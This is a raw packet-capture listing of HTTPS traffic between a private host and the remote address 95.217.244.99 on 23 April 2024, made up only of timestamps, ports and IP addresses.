Apr 23, 2024 21:44:18.083877087 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.083884001 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.083949089 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.092660904 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.092679977 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.092752934 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.092762947 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.092801094 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.100830078 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.100851059 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.100975037 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.100986004 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.101028919 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.108061075 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.108081102 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.108170033 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.108181000 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.108222008 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.116350889 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.116372108 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.116494894 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.116507053 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.116544962 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.123255968 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.123285055 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.123389959 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.123404026 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.123454094 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.130554914 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.130578041 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.130651951 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.130662918 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.130708933 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.137295008 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.137314081 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.137408018 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.137419939 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.137458086 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.144757032 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.144776106 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.144828081 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.144834042 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.144879103 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.151015997 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.151035070 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.151112080 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.151119947 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.151160002 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.157661915 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.157677889 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.157744884 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.157754898 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.157792091 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.164712906 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.164731979 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.164860010 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.164870024 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.164921999 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.170633078 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.170649052 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.170738935 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.170759916 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.170800924 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.176493883 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.176512003 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.176579952 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.176589966 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.176623106 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.183501959 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.183516979 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.183594942 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.183617115 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.183657885 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.189958096 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.189974070 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.190052032 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.190067053 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.190105915 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.195529938 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.195547104 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.195621014 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.195627928 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.195664883 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.202104092 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.202121019 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.202208996 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.202214956 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.202255964 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.209055901 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.209072113 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.209153891 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.209161997 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.209202051 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.214313984 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.214329958 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.214417934 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.214430094 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.214471102 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.219496965 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.219512939 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.219593048 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.219602108 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.219640017 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.225770950 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.225790977 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.225874901 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.225882053 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.225919962 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.230854034 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.230875015 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.230952978 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.230966091 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.231005907 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.235754013 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.235773087 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.235857964 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.235872984 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.235909939 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.241509914 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.241529942 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.241605043 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.241611958 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.241650105 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.246380091 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.246402979 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.246460915 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.246465921 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.246500969 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.251321077 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.251339912 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.251398087 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.251403093 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.251446009 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.255935907 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.255958080 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.256017923 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.256022930 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.256059885 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.261250973 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.261270046 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.261338949 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.261343956 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.261384964 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.265820980 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.265836954 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.265921116 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.265925884 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.265965939 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.270628929 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.270643950 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.270715952 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.270720005 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.270759106 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.276206017 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.276221037 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.276294947 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.276299953 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.276339054 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.280023098 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.280035973 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.280107975 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.280112028 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.280147076 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.284586906 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.284600019 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.284686089 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.284712076 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.284751892 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.289020061 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.289033890 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.289113045 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.289119959 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.289160967 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.293874025 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.293888092 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.293961048 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.293966055 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.294013023 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.298100948 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.298141956 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.298181057 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.298186064 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.298228979 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.302783966 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.302826881 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.302876949 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.302882910 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.302907944 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.302933931 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.307095051 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.307135105 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.307178020 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.307185888 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.307218075 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.307248116 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.310671091 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.310717106 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.310760975 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.310766935 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.310800076 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.310825109 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.314531088 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.314574957 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.314620972 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.314625978 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.314675093 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.319314003 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.319354057 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.319400072 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.319412947 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.319430113 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.319459915 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.322695017 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.322736025 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.322779894 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.322784901 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.322820902 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.322845936 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.327301025 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.327341080 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.327378988 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.327383041 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.327429056 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.331396103 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.331438065 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.331475019 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.331480026 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.331506014 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.331532955 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.334609985 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.334656000 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.334687948 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.334692001 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.334733963 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.338130951 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.338171959 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.338206053 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.338211060 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.338243008 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.338262081 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.342433929 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.342513084 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.342550039 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.342555046 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.342595100 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.345896006 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.345936060 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.345972061 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.345976114 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.345999956 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.346025944 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.349263906 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.349307060 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.349339962 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.349344015 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.349387884 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.353529930 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.353573084 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.353617907 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.353630066 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.353647947 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.353677034 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.356726885 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.356743097 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.356817961 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.356832981 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.356872082 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.359970093 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.359987020 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.360050917 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.360061884 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.360105991 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.363214016 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.363240004 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.363312960 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.363322973 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.363360882 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.367111921 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.367134094 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.367227077 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.367235899 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.367276907 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.370290041 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.370309114 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.370390892 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.370399952 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.370436907 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.373421907 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.373439074 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.373524904 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.373538017 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.373577118 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.377213001 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.377232075 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.377350092 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.377357960 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.377403021 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.380285978 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.380306005 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.380393982 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.380400896 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.380444050 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.383269072 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.383287907 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.383354902 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.383368969 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.383397102 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.383421898 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.386221886 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.386235952 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.386298895 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.386313915 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.386352062 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.389230967 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.389245987 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.389303923 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.389307976 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.389347076 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.392656088 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.392671108 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.392745972 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.392750025 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.392787933 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.395539045 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.395555019 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.395612001 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.395616055 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.395653009 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.399240017 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.399252892 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.399333000 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.399343014 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.399384022 CEST	49723	443	192.168.2.6	95.217.244.99
